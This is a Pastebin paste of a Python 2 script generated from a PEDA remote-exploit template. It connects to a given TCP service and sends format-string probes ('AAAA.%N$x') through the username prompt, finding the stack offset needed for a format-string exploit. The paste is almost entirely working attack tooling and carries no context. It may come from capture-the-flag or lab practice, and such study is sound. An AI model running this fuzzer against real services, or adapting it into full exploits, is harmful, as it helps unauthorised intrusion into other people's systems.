Guest User

Untitled

a guest
Jul 27th, 2014
94
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. #
  3. # Template for remote TCP exploit code, generated by PEDA
  4. #
  5. import os
  6. import sys
  7. import struct
  8. import resource
  9. import time
  10. import re
  11.  
  12. def usage():
  13.     print "Usage: %s host port" % sys.argv[0]
  14.     return
  15.  
  16. from socket import *
  17. import telnetlib
  18. class TCPClient():
  19.     def __init__(self, host, port, debug=0):
  20.         self.debug = debug
  21.         self.sock = socket(AF_INET, SOCK_STREAM)
  22.         self.sock.connect((host, port))
  23.  
  24.     def debug_log(self, size, data, cmd):
  25.         if self.debug != 0:
  26.             print "%s(%d): %s" % (cmd, size, repr(data))
  27.  
  28.     def send(self, data, delay=0):
  29.         if delay:
  30.             time.sleep(delay)
  31.         nsend = self.sock.send(data)
  32.         if self.debug > 1:
  33.             self.debug_log(nsend, data, "send")
  34.         return nsend
  35.  
  36.     def sendline(self, data, delay=0):
  37.         nsend = self.send(data + "\n", delay)
  38.         return nsend
  39.  
  40.     def recv(self, size=1024, delay=0):
  41.         if delay:
  42.             time.sleep(delay)
  43.         buf = self.sock.recv(size)
  44.         if self.debug > 0:
  45.             self.debug_log(len(buf), buf, "recv")
  46.         return buf
  47.  
  48.     def recv_until(self, delim):
  49.         buf = ""
  50.         while True:
  51.             c = self.sock.recv(1)
  52.             buf += c
  53.             if delim in buf:
  54.                 break
  55.         self.debug_log(len(buf), buf, "recv")
  56.         return buf
  57.  
  58.     def recvline(self):
  59.         buf = self.recv_until("\n")
  60.         return buf
  61.  
  62.     def close(self):
  63.         self.sock.close()
  64.  
  65.  
  66. def exploit(host, port):
  67.     index = 0
  68.     done = False   
  69.     try:
  70.         # connect
  71.         port = int(port)
  72.         client = TCPClient(host, port, debug=0)
  73.         print '[+] Fuzzer started'
  74.         # max index of 1024    
  75.         while index != 1024:
  76.                                    
  77.             # recieve username banner and send a crafted formatstring response
  78.             client.recv(1024)
  79.  
  80.             # increase index starting from 1
  81.             index += 1
  82.             fsr = "AAAA.%{0}$x".format(str(index))
  83.             client.send(fsr + '\n')
  84.            
  85.             # recieve password banner and send a empty response
  86.             client.recv(1024)
  87.             client.send('\n')
  88.            
  89.             # recieve email banner and send a empty response
  90.             client.recv(1024)
  91.             client.send('\n')
  92.            
  93.             # recieve the result message and extract the formatstring response
  94.             # from the username entry
  95.             l = re.findall(r"'(.*?)'", client.recv(1024))
  96.            
  97.             # if the begin of the stack if found show the info
  98.             if l[0].endswith('41414141'):
  99.                 print "[*] stack_index @ {0}".format(str(index))
  100.                 done = True
  101.            
  102.             # recieve the retry message and send 'yes' to continue or 'no' if done
  103.             client.recv(1024)
  104.             if not done:
  105.                 client.send('yes\n')
  106.             else:
  107.                 client.send('no\n')
  108.                 client.close()
  109.                 break
  110.        
  111.         # some insurence
  112.         client.close()
  113.        
  114.         print '[-] Fuzzer finished'
  115.    
  116.     except KeyboardInterrupt:
  117.         pass
  118.  
  119. if __name__ == "__main__":
  120.     if len(sys.argv) < 3:
  121.         usage()
  122.     else:
  123.         exploit(sys.argv[1], sys.argv[2])
RAW Paste Data